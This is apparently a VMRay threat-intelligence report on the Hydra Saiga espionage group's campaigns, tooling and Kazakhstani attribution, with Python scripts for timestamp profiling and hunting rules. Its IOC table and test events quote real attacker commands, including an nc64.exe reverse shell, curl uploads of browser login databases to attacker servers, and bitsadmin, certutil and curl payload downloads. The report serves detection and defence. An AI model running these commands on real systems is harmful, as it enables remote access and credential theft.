TLP: Green 🟢
Disclaimer:
At VMRay, we believe in supporting the broader research community, as we know that collective intelligence is our best defense.
To that end, we recently collaborated with independent researcher Pol Thill on a deep-dive investigation into a series of complex campaign clusters.
His work, which also made use of the evasion-resistant sandboxing capabilities of VMRay DeepResponse, has been instrumental in attributing these actions to Hydra Saiga / Yorotrooper.
IOCs & TTPs from this research have been made available within VMRay UniqueSignal Threat Intelligence Feed.
Key highlights:
Active Presence: Hydra Saiga (also known as Yorotrooper or ShadowSilk) has been active since at least 2021 and remains a significant, resilient threat as of late 2025.
Geopolitical Alignment: The group demonstrates a clear state-sponsored agenda by targeting critical water and energy infrastructure in Central Asia, directly mirroring Kazakhstan’s strategic interests.
Widespread Impact: Analysis identified at least 34 compromised organizations across 8 countries, with reconnaissance activity extending to over 200 additional targets globally.

VICTIMOLOGY
Europe:
Countries: Bulgaria, Slovakia, Netherlands, Greece, Czechia
Industries: Government, Energy, Manufacturing, Education, Legal
CIS:
Countries: Russia, Turkmenistan, Kyrgyzstan, Azerbaijan, Georgia, Mongolia, Tajikistan, Uzbekistan, Armenia, Belarus
Industries: Government, Energy, Water (unique to this region), Healthcare, Legal, Manufacturing
Middle East & Africa:
Countries: Morocco, Turkey, South Africa, Egypt, Iran, Oman
Industries: Government, Energy, Manufacturing, Aviation (Unique to this region)
South Asia:
Countries: Afghanistan, Pakistan, Indonesia, Bangladesh, Thailand, India, Singapore
Industries: Government, Energy, Healthcare, Legal, Manufacturing
South America:
Countries: Brazil, Argentina, Peru, Colombia
Industries: Energy, Legal, Healthcare, Manufacturing
Attribution Clues: Forensic patterns—specifically a UTC+5 working schedule and inactivity during Kazakhstani national holidays—strongly link the group’s operations to Kazakhstan.
Telegram as Command-and-Control: A defining characteristic of the group is the use of the Telegram Bot API for C2 communication, allowing easy setup and operation of their implants.
Evolving Toolkit: The actor employs a mix of custom implants (written in Rust, Go, and Python) and “Living off the Land” techniques, recently adapting to bypass modern defenses like Chrome’s app-bound encryption.
Critical OPSEC Failures: Operators committed significant security blunders, including infecting their own staging machines with their own implants, which exposed their browser histories, search queries, and internal infrastructure details.

HYDRA SAIGA: COVERT ESPIONAGE AND INFILTRATION OF CRITICAL UTILITIES
Hydra Saiga, also known as Yorotrooper[1], ShadowSilk[2], and Silent Lynx[3], is a suspected Kazakhstani state-sponsored threat actor, targeting government, energy and critical infrastructure in Central Asia, Europe and the Middle East. Active since at least 2021, Hydra Saiga is known for their use of the Telegram Bot API to establish C2 communication, using commodity implants such as Havoc or resocks, but also developing their own payloads written in Python, PowerShell, Golang, and Rust.
This blog post focuses on the recent post-exploitation activity of the actor as opposed to their initial access operations, which have been well covered, as well as diving into attribution, exploring the connection to the Tomiris[4] cluster, and the location of operators. The “Hydra Saiga” name for the threat cluster originated from their affinity for going after organisations linked to water resources, as well as their focus on Central Asia, with the Saiga antelope being one of the most unique animals inhabiting the Central Asian steppe.
INFECTION VECTORS
First Campaign
The first Hydra Saiga activity observed was in December 2024, when a file called “Letter from the Permanent Representative of Turkmenistan to the UN addressed to the UN Secretary General regarding the launch.exe” was uploaded to VirusTotal. This executable and its functionalities have been described in detail by Seqrite in their blog post about Silent Lynx[3]. It acts as a loader for a PowerShell backdoor using Telegram-as-a-C2 to communicate. Sandbox analysis in VMRay Platform (Figure 1) shows the key behavioral markers (VTIs) of this loader:
– Executing a PowerShell script from an executable
– Attempt to bypass PowerShell’s execution policy and skip loading profiles
– DNS request to Telegram API
Figure 1: Flagged key behaviors | VMRay Platform
The base64 blob decodes to the fully functional PowerShell backdoor (Figures 2 and 3), which polls the /getUpdates Telegram Bot API endpoint to receive new commands from its operators and implements upload and download of files to and from an operator-controlled Telegram chat.
By pivoting on this defense evasion behaviour, a host of other samples of this initial loader were revealed, dating back to August 2024; some of them were packaged in ISO or RAR files and attached to phishing emails sent from previously compromised email accounts.
Figure 2: Executed powershell command | VMRay Platform
Figure 3: Base64 decoded command
Figure 4: Network communication with Telegram API via Nonintrusive TLS visibility | VMRay Platform
(Note: the bot token had already been revoked, which is why Telegram returns HTTP 401.)
The archive files sometimes contained decoy documents, referencing events or organisations in the region:


Figure 5: Decoy documents referencing regional organizations/events used by Hydra Saiga
Second Campaign
By pivoting on one of the IP addresses Hydra Saiga used during post-exploitation activity to host payloads, 185.106.92[.]127, a second initial infection vector was uncovered, this one originating from a phishing email.
Figure 6: Phishing email targeting Royal Oman Police
The email was sent from the address natalnayayevgenevna@mail[.]ru masquerading as a researcher from the Nile Research Institute and was addressed to the Royal Oman Police. The password-protected RAR attachment contained a Word document called “إنجازات الربع الثالث 2024 (003).doc“ running a malicious Macro upon opening. Submitting this again to VMRay allows us to see key behavioural clues.
Figure 7: Flagged key behaviours: creation of a PowerShell process from a document, obfuscated macros and execution of macros on the “open” event
Figure 8: Screenshot of the Malicious Word document
The Macro downloads a PowerShell script from the previously mentioned IP and executes it.
Figure 9: Creation of the PowerShell process from the Word document, showing the command line arguments used to download the next stage payload
Figure 10: The Macros extracted | VMRay Platform
Figure 11: Deobfuscated malicious Macro
Figure 12: Metadata from the Office document such as creation date and author
The downloaded PowerShell script is a simple obfuscated backdoor that executes attacker-provided commands on the host using Invoke-Expression and sends the result back to the same IP.
Figure 13: Deobfuscated PowerShell backdoor
Unfortunately, the commands subsequently issued could not be recovered; however, the IP also hosted a Meterpreter executable around the time this campaign was running.
POST-EXPLOITATION ACTIVITY
The commands sent by the operators to the Telegram-as-a-C2 backdoors, which we were able to capture, reveal a highly manual, hands-on-keyboard operation. Operators rely heavily on sequential, non-scripted execution of standard Windows utilities (Living Off the Land or LotL) for every stage of the intrusion lifecycle, from credential harvesting (e.g., LSASS dumps) to final exfiltration (e.g., curl commands). The analysis below is structured according to the techniques observed in this manual command stream.
Figure 14: VMRay highlighting Telegram Bot API traffic
Persistence

Figure 15: Operator commands used to establish persistence
Hydra Saiga mainly established persistence through scheduled tasks and manipulating registry keys. The executables that would be executed by these mechanisms were mostly versions of the PowerShell Telegram-as-a-C2 backdoor.
Credential Access

Figure 16: Operator commands to capture user credentials
To prepare for lateral movement and privilege escalation, Hydra Saiga operators used a plethora of techniques, from simply exfiltrating a file called “passwords.txt” found on the victim’s Desktop, to using the open-source tool FakeLogonScreen[6] which displays a fake Windows logon screen to capture a victim’s password. Operators were also observed exporting SAM and SECURITY hives to try and crack password hashes as well as enabling WDigest to store credentials in plaintext and then dumping LSASS memory to try and extract them.
Lateral Movement

Figure 17: Operator commands to move laterally within a compromised network
To move laterally to a domain controller once they had access to an Administrator account, operators used nltest to discover the controller’s address and then used either Windows Management Instrumentation (WMI) or PsExec to download and execute a reverse socks5 proxy client.
Defense Evasion

Figure 18: Operator commands disabling defense measures
To ensure their payloads would remain undetected, operators would disable features of Microsoft Defender as well as trying to disable the firewall on infected devices to facilitate the connection of the reverse proxy client back to the C2 server.
Collection

Figure 19: Operator commands collecting files and screenshots
Operators took screenshots of infected machines using the PRTSC key, as well as using RAR to package documents and files into an archive ready for exfiltration.
Ingress Tool Transfer

Figure 20: Operator commands downloading additional tools
Hydra Saiga used curl, wget, bitsadmin, as well as PowerShell to download further tools on infected devices. These tools were commonly packaged in password-protected RAR archives, and ranged from reverse proxy clients like resocks[7] and tunnelling software like chisel[8] to custom browser data collectors.
Exfiltration
Figure 21: Operator commands exfiltrating RAR archive
Besides simply exfiltrating collected documents using curl to a C2 server, one of the most commonly deployed tools by Hydra Saiga was a PyInstaller executable collecting and decrypting the Chrome Login Data database.
Figure 22: PyInstaller executable decrypting and exfiltrating Chrome “Login Data” database
Hydra Saiga later iterated upon this initial tool and developed a Golang executable exfiltrating browser data for Edge, Firefox, Yandex, Opera, and Chrome, including a user’s browsing history, saved logins, and stored cookies.
Figure 23: Archive of collected CSV browser data files from Golang infostealer
As some of the operators infected their own devices, it was possible to capture the browser history from some of their staging servers which helped establish a better view of their full capabilities.
Initial Reconnaissance
Hydra Saiga used tools such as Censys and Shodan to scan for exposed servers as well as assess their targets:
- Hosts Search – Censys: hxxps[:]//search.censys[.]io/search?q=labels%3D+%60email%60&resource=hosts
- 195.38.162[.]147 – Host Summary – Censys: hxxps[:]//search.censys[.]io/hosts/195.38.162[.]147
- Shodan Account: hxxps[:]//account.shodan[.]io/login?continue=https%3A%2F%2Fwww.shodan[.]io%2Fdashboard
Once a target had been identified, operators would use the web application security scanner Acunetix to find any vulnerabilities:
- Acunetix – Vulnerabilities: hxxps[:]//localhost:3443/#/scans/f806f0a0-9553-442f-841b-2aa9a983bea0/vulnerabilities?severity=3
Operators would also search for default passwords if they had identified a certain exposed server or use brute forcing to try to gain access:
- pfsense default password – Google Search: hxxps[:]//www.google[.]com/search?q=pfsense+default+password
- C:\Users\Administrator\Downloads\7-more-passwords.txt: hxxps[:]//github[.]com/duyet/bruteforce-database/blob/master/7-more-passwords.txt
Other initial access methods include searching for emails related to VPN configuration in compromised email accounts and downloading VPN setup tools to access target networks directly:
- Search – Mail.ru Mail: hxxps[:]//e.mail[.]ru/search/?q_query=VPN
- C:\Users\Admin\Downloads\Setting_up_Account***By_VPN_new.bat: hxxps[:]//***[.]by/index.php/apps/files/?dir=/G-SecTLS_Client/%D0%9D%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B0%20%D0%BA%20***.by%20&fileid=7217539
Operators would also use compromised government email inboxes to send phishing emails to other government ministries or individuals in order to reach their final target:
- hxxps[:]//***.uz/webmail/?_task=mail&_mbox=INBOX&_to=***%40minwater.uz&_action=compose
- Kerio Connect Client: hxxps[:]//mail.***.uz/webmail/#window/mail/compose/compose$3A***$20***$20$3asr$40gov[.]uz$3E
Lastly, some operators started experimenting with the Havoc C2 framework[9] in March 2025, to supplement their tooling:
- How To Install And Setup Havoc C2 Framework In Kali Linux (Bypass Windows 11 Defender) – InfoSec Pat – YouTube: hxxps[:]//www.youtube[.]com/watch?v=AD1S9-MetuM
- Havoc/client/src at main · HavocFramework/Havoc · GitHub: hxxps[:]//github[.]com/HavocFramework/Havoc/tree/main/client/src
Infrastructure
As can be seen in the IOC section, Hydra Saiga operators preferred hosting providers offering anonymous payment methods, these being BitLaunch and PSB Hosting for their C2 servers and QHoster to register their domains. All of these providers allow users to pay for their services using cryptocurrency.
Furthermore, operators would also use compromised websites to host initial malicious RAR archives, often by obtaining credentials for the victims’ webhosting provider and then uploading their malicious files to the legitimate websites.
Link to Tomiris
In January 2025, the actor logged in to three servers at 82.115.223[.]210, 81.19.136[.]241, and 141.98.82[.]198 on port 9942, and exfiltrated data from compromised systems using curl to a server located at 88.214.26[.]37. When investigating these IPs on VirusTotal, two of them were also connected to by JLORAT samples with names such as “Фаврӣ! нх37977 теъдоди занони дар маҳбасбуда.exe” (Tajik: Urgent! nx37977 number of women in prison.exe) or “Owganystanyň gümrük edarasy bilen hyzmatdaşlygy barada.exe” (Turkmen: On cooperation with the Afghan customs service). The executables seem to have targeted organizations in Turkmenistan, Tajikistan and Russia, mostly in March 2025.
Figure 24: VirusTotal submissions of JLORAT sample
Analysis of the executables revealed that they were JLORAT samples, a backdoor written in Rust initially described by Kaspersky in April 2023[4] and associated with an actor they were tracking as Tomiris at the time. One of the tools used by Tomiris was Telemiris, a Python backdoor that uses Telegram-as-a-C2 to communicate with its operators and functions similarly to current Hydra Saiga implants. Given the shared victimology, the near-identical tooling (Telegram C2s), and the critical observation that Hydra Saiga operators were logging directly into JLORAT C2 infrastructure (a tool exclusively tied to Tomiris), we assess that Hydra Saiga likely overlaps with the Tomiris threat cluster, and that both entities operate for Kazakhstani state interests. Kaspersky recently published a blog[5] about Tomiris and their recent activity, which matches the observations made when looking at operator activity.
Victimology
Between April 2023 and August 2025, Hydra Saiga compromised at least 34 different organizations across 8 countries, mostly operating in the government, critical infrastructure, energy, healthcare, and legal sectors and located in Central Asia, with the outliers being Egypt and Georgia. Furthermore, the operators conducted extensive reconnaissance and login attempts against an additional 200 organizations worldwide in similar sectors, located as far away as South America and Southeast Asia.
We sought to highlight two specific industry verticals that Hydra Saiga has consistently targeted, demonstrating how their operations align with the larger geopolitical context of the Central Asian region.

Water Campaign
Between September 2024 and March 2025, Hydra Saiga conducted an extensive campaign targeting critical water infrastructure, research institutions, and government ministries. The targeting was specifically focused on infrastructure linked to the two major regional rivers: the Syr Darya and Amu Darya.
This campaign led to compromises within:
- The operator of hydroelectric power plants and the water resource service in Kyrgyzstan.
- A regional administration, a research institute, and the Ministry of Water Resources in Uzbekistan.
- The Ministry of Energy and Water Resources in Tajikistan.
Figure 26: Map demonstrating how Hydra Saiga’s victims relate to Central Asia’s rivers
This activity aligns strongly with Kazakhstan’s geopolitical interests. The country is heavily dependent on the Syr Darya river for its southern agricultural regions and the restoration of the North Aral Sea[10]. Furthermore, Hydra Saiga targeted two water utility companies in Russia during 2024, indicating a broad, strategic intelligence collection effort across the regional water network.
Gas and SCADA Campaign
On the 29th of April 2024, Hydra Saiga operators attempted to access several exposed SCADA endpoints and manufacturing equipment manufacturers across multiple countries, including Argentina, Brazil, India, the Netherlands, and Czechia. While these intrusion attempts appear to have been unsuccessful, the following day operators attempted to gain access to the gas distribution system of a Russian region bordering Kazakhstan. Russia is a primary gas supplier for Kazakhstan’s northern regions, with increasing bilateral collaboration on pipeline projects[11]. It is possible Hydra Saiga operators were testing their capabilities and experimenting with SCADA endpoints in preparation for the intrusion attempt against Russia, as the targets do not align with their usual victims.
Attribution
Given that operator messages sent via the Telegram C2 are intrinsically hands-on-keyboard activity, we parsed the timestamps to forensically determine the threat actor’s working hours and likely time zone.
Figure 27: Graph showing a UTC+5 working pattern from hands-on-keyboard activity
The aggregated activity graph reveals a distinct UTC+5 working pattern, consistent across the entire campaign duration. Work begins and peaks sharply around 10:00, shows a secondary peak around 15:00, and rapidly declines after 18:00.
Splitting the activity into specific Telegram accounts reveals a similar picture:
Figure 28: Graph divided into individual Telegram user accounts
To corroborate the time zone findings, a calendar heatmap was created based on the activity of user 7677012063 in the form of a GitHub activity diagram:
Figure 29: Calendar Heatmap of operator activity from February to April 2025
Crucially, the operators were consistently active on every single working day observed in the spring of 2025, with two exceptions:
Monday, 10th of March and Tuesday, 25th of March.
Searching for national holidays on both days in Central Asia, Russia and China leaves only a single country that celebrates public holidays on those days, this being Kazakhstan.
10th of March: Day off for International Women’s Day, which is celebrated on the 8th of March
25th of March: Day off for Nauryz Holiday, the Persian New Year
Given previous Tomiris/Yorotrooper reporting, specific targeting aligned with Kazakhstani geopolitical interests (water, gas, neighbouring governments), and hands-on-keyboard activity patterns that conclusively correlate with Kazakhstani public holidays, it is highly likely that Hydra Saiga operates for Kazakhstani state interests. It is, however, also possible that some operators reside in other countries: one operator searched for “kazakhstan time zone” and “kazakhstan time now” on a machine set to the UTC+3 (Russia) time zone, and Group-IB also identified a Chinese-speaking operator in their analysis of ShadowSilk.
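The timestamp analysis described above, as an added example that is not the researcher's or VMRay's own tooling: it assumes the operator messages were collected as Telegram Bot API getUpdates JSON (where message.date is a Unix timestamp in UTC), infers the operators' UTC offset with a simple workday-fit heuristic, lists weekdays with no activity at all (the holiday check), and splits the peak hour per account. The sample updates are constructed; 7677012063 is the account id from the report and the second id is invented.

```python
"""Operator working-hour profiling from Telegram Bot API getUpdates output."""
from collections import Counter, defaultdict
from datetime import date, datetime, timedelta, timezone
import json


def constructed_updates() -> str:
    """Constructed getUpdates-style dump: every weekday of March 2025 carries a
    burst of messages between 09:00 and 17:59 UTC+5, except Monday 10 March and
    Tuesday 25 March. 7677012063 is the account id named in the report; the
    second id is invented."""
    tz = timezone(timedelta(hours=5))
    updates, uid = [], 1000
    day = date(2025, 3, 3)
    while day <= date(2025, 3, 31):
        if day.weekday() < 5 and day not in (date(2025, 3, 10), date(2025, 3, 25)):
            for hour in (9, 10, 10, 11, 13, 15, 15, 16, 17):
                sender = 7677012063 if hour < 14 else 1111111111
                local = datetime(day.year, day.month, day.day, hour, 30, tzinfo=tz)
                updates.append({"update_id": uid, "message": {
                    "message_id": uid, "from": {"id": sender, "is_bot": False},
                    "chat": {"id": sender, "type": "private"},
                    "date": int(local.timestamp()),  # Unix time, always UTC
                    "text": "<operator command>"}})
                uid += 1
        day += timedelta(days=1)
    return json.dumps({"ok": True, "result": updates})


def load_message_times(raw: str) -> list[tuple[int, datetime]]:
    """Return (sender id, UTC datetime) for every message in a getUpdates dump."""
    out = []
    for upd in json.loads(raw).get("result", []):
        msg = upd.get("message")
        if not msg or "date" not in msg:
            continue  # edited_message / channel_post updates are ignored here
        ts = datetime.fromtimestamp(msg["date"], tz=timezone.utc)
        out.append((msg.get("from", {}).get("id", 0), ts))
    return out


def hourly_histogram(times, offset_hours: int) -> Counter:
    """Messages per local hour once UTC is shifted by offset_hours."""
    tz = timezone(timedelta(hours=offset_hours))
    return Counter(ts.astimezone(tz).hour for _, ts in times)


def infer_utc_offset(times, workday=range(9, 18)) -> int:
    """Heuristic: the offset that puts the most messages inside 09:00-17:59.
    Ties go to the offset nearest UTC. Assumes a business-hours operator, which
    is the pattern the aggregated activity graph showed."""
    best_key, best_off = None, 0
    for off in range(-12, 15):
        hist = hourly_histogram(times, off)
        key = (sum(hist[h] for h in workday), -abs(off))
        if best_key is None or key > best_key:
            best_key, best_off = key, off
    return best_off


def inactive_weekdays(times, offset_hours: int) -> list[date]:
    """Mon-Fri dates between first and last message with no activity at all."""
    tz = timezone(timedelta(hours=offset_hours))
    active = {ts.astimezone(tz).date() for _, ts in times}
    if not active:
        return []
    day, last, gaps = min(active), max(active), []
    while day <= last:
        if day.weekday() < 5 and day not in active:
            gaps.append(day)
        day += timedelta(days=1)
    return gaps


def peak_hour_per_user(times, offset_hours: int) -> dict[int, int]:
    """Busiest local hour for each sender id (the per-account split of Figure 28)."""
    tz = timezone(timedelta(hours=offset_hours))
    per_user = defaultdict(Counter)
    for sender, ts in times:
        per_user[sender][ts.astimezone(tz).hour] += 1
    return {u: h.most_common(1)[0][0] for u, h in per_user.items()}


if __name__ == "__main__":
    msgs = load_message_times(constructed_updates())
    off = infer_utc_offset(msgs)
    hist = hourly_histogram(msgs, off)
    print(f"inferred working time zone: UTC{off:+d}")
    for hour in range(24):  # text version of the hourly activity graph
        print(f"{hour:02d}:00 {'#' * (hist[hour] // 4)}")
    print("peak hour per account:", peak_hour_per_user(msgs, off))
    print("inactive weekdays:", [d.isoformat() for d in inactive_weekdays(msgs, off)])
```

On real data the inactive-weekday list is what gets checked against public-holiday calendars, as done with 10 and 25 March above.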
Recommendations
The best way to defend against Hydra Saiga is to first block any communication with the domain “api.telegram.org”, used for the Telegram Bot API. Post-exploitation activity relies heavily on living-off-the-land tools as well as C2 connections to a common set of ASNs (see the IOCs section) that operators keep reusing; monitoring connections to unusual IP addresses within these providers can help find infected devices. Lastly, a rise in outgoing emails on mail servers, often the final target of Hydra Saiga operators, should help identify a compromised account so defenders can react quickly.
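One way to turn these recommendations, together with the command shapes seen in the Ingress Tool Transfer, Credential Access and Exfiltration sections, into hunting rules, as an added example that is not VMRay detection content: it assumes proxy, EDR and mail-gateway events normalised to the constructed dict schema used below, with a dst_asn field supplied by a prior ASN enrichment step; the ASN numbers are those from the IOC table, the WDigest registry command is the standard one, and the sample events are constructed.

```python
"""Hunting rules built from the report's recommendations and observed TTPs."""
import re
from collections import defaultdict

# ASNs of the hosting providers listed in the IOC table (page values). dst_asn is
# assumed to be added to network events by an ASN enrichment step beforehand.
REUSED_ASNS = {399629, 214927, 35042, 209588, 208637, 9123}
TELEGRAM_API = "api.telegram.org"

# Command-line shapes from the operator command stream: ingress tool transfer,
# curl-based exfiltration and the WDigest registry change (standard command).
PATTERNS = {
    "lotl-download": re.compile(
        r"\b(bitsadmin(\.exe)?\s+/transfer|certutil(\.exe)?\s+-urlcache"
        r"|curl(\.exe)?\b.*\s-o\s|wget(\.exe)?\s+https?://)", re.I),
    "curl-post-exfil": re.compile(r"\bcurl(\.exe)?\b.*\s-X\s+POST\b", re.I),
    "wdigest-plaintext": re.compile(
        r"\breg(\.exe)?\s+add\b.*WDigest.*UseLogonCredential", re.I),
}


def check_network(ev: dict) -> list[str]:
    """Telegram Bot API traffic and connections into the reused hosting ASNs."""
    hits = []
    if ev.get("dst_host", "").lower() == TELEGRAM_API:
        hits.append("telegram-bot-api")
    if ev.get("dst_asn") in REUSED_ASNS:
        hits.append(f"reused-asn-{ev['dst_asn']}")
    return hits


def check_process(ev: dict) -> list[str]:
    """Names of every LotL pattern that matches the process command line."""
    cmd = ev.get("cmdline", "")
    return [name for name, rx in PATTERNS.items() if rx.search(cmd)]


def mail_spikes(mail_events, ratio=5.0, min_count=20) -> list[dict]:
    """Flag a day on which an account sent >= ratio x its earlier daily mean."""
    per_account = defaultdict(list)
    for ev in mail_events:
        per_account[ev["account"]].append((ev["day"], ev["sent"]))
    alerts = []
    for account, days in per_account.items():
        days.sort()
        for i in range(1, len(days)):  # the first day only seeds the baseline
            baseline = sum(s for _, s in days[:i]) / i
            day, sent = days[i]
            if sent >= min_count and sent >= ratio * baseline:
                alerts.append({"ts": day, "host": account, "rule": "outbound-mail-spike",
                               "detail": f"{sent} sent vs baseline {baseline:.1f}/day"})
    return alerts


def hunt(events) -> list[dict]:
    """Run every rule over normalised events and return one alert per hit."""
    alerts = []
    for ev in events:
        check = {"net": check_network, "proc": check_process}.get(ev["type"])
        for rule in (check(ev) if check else []):
            detail = ev.get("cmdline") or ev.get("dst_host") or ev.get("dst_ip")
            alerts.append({"ts": ev["ts"], "host": ev["host"], "rule": rule, "detail": detail})
    alerts.extend(mail_spikes([e for e in events if e["type"] == "mail"]))
    return alerts


# Constructed events. 185.106.92.127 / AS214927, the bitsadmin line and the curl
# POST line come from the IOC table; the Telegram and benign destinations use
# documentation placeholders (203.0.113.x, private ASNs 64512/64513).
CONSTRUCTED_EVENTS = [
    {"type": "net", "ts": "2025-03-05T05:01:00Z", "host": "WS01",
     "dst_host": "api.telegram.org", "dst_ip": "203.0.113.10", "dst_asn": 64512},
    {"type": "net", "ts": "2025-03-05T05:02:10Z", "host": "WS01",
     "dst_host": "", "dst_ip": "185.106.92.127", "dst_asn": 214927},
    {"type": "net", "ts": "2025-03-05T05:03:00Z", "host": "WS02",
     "dst_host": "updates.example.com", "dst_ip": "203.0.113.20", "dst_asn": 64513},
    {"type": "proc", "ts": "2025-03-05T05:02:05Z", "host": "WS01", "cmdline":
     r"bitsadmin /transfer myjob /download /priority high "
     r"http://185.106.92.127/syclog.exe C:\Users\Public\syclog.exe"},
    {"type": "proc", "ts": "2025-03-05T05:10:00Z", "host": "WS01", "cmdline":
     r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "
     r"/v UseLogonCredential /t REG_DWORD /d 1 /f"},
    {"type": "proc", "ts": "2025-03-05T06:40:00Z", "host": "WS01", "cmdline":
     r"curl.exe -X POST --limit-rate 600k http://88.214.26.37:443/upload"},
    {"type": "proc", "ts": "2025-03-05T06:41:00Z", "host": "WS02",
     "cmdline": r"notepad.exe C:\Users\a\notes.txt"},
] + [{"type": "mail", "ts": d, "host": "MAIL01", "account": "press@ministry.example",
      "day": d, "sent": n} for d, n in [("2025-03-03", 12), ("2025-03-04", 9),
                                        ("2025-03-05", 14), ("2025-03-06", 180)]]

if __name__ == "__main__":
    for a in hunt(CONSTRUCTED_EVENTS):
        print(f"{a['ts']}  {a['host']:<22} {a['rule']:<20} {a['detail']}")
```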
Conclusion
Hydra Saiga is here to stay. They have shown resiliency over the years, weathering multiple operation disclosures, and have established themselves as one of the biggest threats to organizations in Central Asia and the Middle East. With resource shortages only increasing, it is likely Hydra Saiga will continue to iterate on their custom tools and experiment with new commodity malware. An example of this is that in July 2025, an operator developed a new browser login data extractor to circumvent the newly introduced Chrome app-bound encryption, as well as implants abusing Discord-as-a-C2. As Hydra Saiga continues to demonstrate an adaptable and highly persistent operational model, defenders in the region must recognize this threat as a mature, state-aligned entity requiring sustained, intelligence-driven defense.
IOCs
| Description | SHA256 |
| --- | --- |
| PowerShell loader from the first campaign | a44827d002d7d1a74963b80e6af8a7257977f44c89caff66f126b7d1cad1fd11 |
| Lure document | f78dad5a95bb01f14c822addc8e4ec17b3c95b7e42f27f68f678fb43a9e56d63 |
| FakeLogonScreen tool | e179bf035b9d9d17f8a76ecfc1ebf3b19b69f8ea05421f0d4507ded9e60c657c |
| Golang stealer | 3da644eec41a32d72d3632b76a524d836f39f3b9854eda5d227cdf7fc4c7b543 |
| PyInstaller stealer | 8dda063860120a04bf3c7679f6a02a14aee4b5d2c3efc4dbd638dabce8a288a5 |
| JLORAT sample | 66962bb324a7c5a57ba0e9663bba156576a7e6aa5c6c1401c315b3d32f8d467d |
| IP Address | Provider (ASN) | Usage |
| --- | --- | --- |
| 64[.]7[.]198[.]46 | 399629 – BL Networks | `hxxp://64.7.198[.]46/rev.exe` – hosting resocks executable |
| 64[.]7[.]198[.]66 | 399629 – BL Networks | `hxxp://64.7.198[.]66/resosk443.exe` – hosting resocks executable |
| 65[.]38[.]120[.]38 | 399629 – BL Networks | `sokcs.exe -connect 65.38.120[.]38:443`; `resocks.exe 65.38.120[.]38:10443 --key mqmK3Iuyq2OI305LiUrHVSI9lVuOLlVvDn3GaGFhvJU` – resocks server |
| 65[.]38[.]121[.]107 | 399629 – BL Networks | `hxxp://65.38.121[.]107:8000/123.txt` |
| 72[.]5[.]43[.]100 | 399629 – BL Networks | `socks.exe -connect 72.5.43[.]100:80`; `rev.exe -connect 72.5.43[.]100:443` – resocks server |
| 72[.]5[.]43[.]178 | 399629 – BL Networks | `sokc.exe -connect 72.5.43[.]178:443` – resocks server |
| 78[.]128[.]112[.]209 | 208637 – 4 Vendeta | `revv2.exe -connect 78.128.112[.]209:443` – resocks server |
| 81[.]19[.]136[.]241 | 9123 – JSC “TIMEWEB” | `rev.exe -connect 81.19.136[.]241:443` – resocks server |
| 82[.]115[.]223[.]210 | 214927 – PSB HOSTING | `hxxp://82.115.223[.]210:9942/panel`; `hxxp://82.115.223[.]210:9942/cmd_*` – JLORAT C2 server |
| 85[.]209[.]128[.]171 | 214927 – PSB HOSTING | `hxxp://85.209.128[.]171:8080/*` – open directory hosting secondary payloads; `123.exe -connect 85.209.128[.]171:10443` |
| 88[.]214[.]26[.]37 | 35042 – Layer 7 Networks | `curl.exe -X POST --limit-rate 600k hxxp://88.214.26[.]37:443/upload` – exfiltration server |
| 96[.]9[.]125[.]168 | 399629 – BL Networks | `rev.exe -pcl 96.9.125[.]168:443`; `revv2.exe -connect 96.9.125[.]168:443` – resocks server |
| 141[.]98[.]82[.]198 | 209588 – Flyservers | `nc64.exe 141.98.82[.]198 443 -e cmd` – nc C2 server; `curl.exe -X POST --limit-rate 600k hxxp://141.98.82[.]198:443//upload` – exfiltration server |
| 172[.]86[.]75[.]237 | 399629 – BL Networks | `rev.exe -pcl 172.86.75[.]237:443` |
| 179[.]60[.]150[.]151 | 35042 – Layer 7 Networks | `/cmd curl --proxy http://ig-es[:]8080 --data-binary "@c:\users\***\Login Data" 179.60.150[.]151:443`; `/cmd curl --proxy http://ig-es[:]8080 hxxp://179.60.150[.]151:443/rsocx.exe -o c:\users\public\rsocx.exe` – exfiltration and secondary tools server |
| 185[.]106[.]92[.]127 | 214927 – PSB HOSTING | `/29605 bitsadmin /transfer myjob /download /priority high http://185.106.92[.]127/syclog.exe C:\Users\Public\syclog.exe` – secondary tools server |
| Domain | Provider | IP resolution | Usage |
| --- | --- | --- | --- |
| adm-govuz[.]com | QHoster | 168[.]100[.]11[.]127 | `/cmd curl -o c:\users\public\rev.rar hxxps://adm-govuz[.]com/rev.rar` – open directory hosting secondary payloads |
| inboxsession[.]info | QHoster | 193[.]149[.]129[.]181 | `/cmd curl -o c:\users\Public\Music\123.rar hxxps://admin.inboxsession[.]info/teal/ru.rar` – open directory hosting secondary payloads |
| altaviva[.]ru | Hoster[.]by | 193[.]176[.]182[.]155 | `/cmd certutil -urlcache -f hxxps://altaviva[.]ru/contacts/rsocx.rar c:\users\public\rsocx.rar` – compromised website hosting open directory |
| allcloudindex[.]com | QHoster | 195[.]85[.]115[.]196 | `/cmd curl -o c:\users\public\pictures\socks.exe hxxps://auth.allcloudindex[.]com/147/sokcs.exe` – open directory hosting secondary payloads |
| wincorpupdates[.]com | QHoster | 86[.]104[.]15[.]60 | `/cmd bitsadmin /transfer www /download hxxps://ex.wincorpupdates[.]com/sokcs.exe c:\users\public\videos\revserv.exe` – open directory hosting secondary payloads |
| france-deguisement[.]fr | PlanetHoster | 185[.]221[.]182[.]193 | `bitsadmin /transfer myjob /download /priority high https://france-deguisement[.]fr/wp-content/samba.exe C:\Users\Public\sokc.exe` – compromised website hosting open directory |
| mailkeyboard[.]com | QHoster | 86[.]104[.]15[.]60 | `C:\Users\Admin\Downloads\medicru (2).rar, hxxps://inbox.mailkeyboard[.]com/medic/medicru.rar` – open directory hosting initial stage malicious archives |
| mailboxarea[.]cloud | QHoster | 86[.]104[.]15[.]60 | `/cmd curl -o c:\users\public\pictures\rserv.exe hxxps://message.mailboxarea[.]cloud/steal/ru.exe` – open directory hosting secondary payloads |
| docworldme[.]com | QHoster | 86[.]104[.]15[.]60 | `C:\Users\Admin\Downloads\Central_Asia-Italy_Jeenbek_Kulubaev_working-visit-to-Italy (1).rar, hxxps://mosreg.docworldme[.]com/mfa/Central_Asia-Italy_Jeenbek_Kulubaev_working-visit-to-Italy.rar` – open directory hosting initial stage malicious archives |
| naryncity[.]kg | Hoster[.]kg | 176[.]126[.]165[.]66 | `C:\Users\Admin\Downloads\kgnotary.rar, hxxps://naryncity[.]kg/minjust.gov.kg/kgnotary.rar` – compromised website hosting open directory |
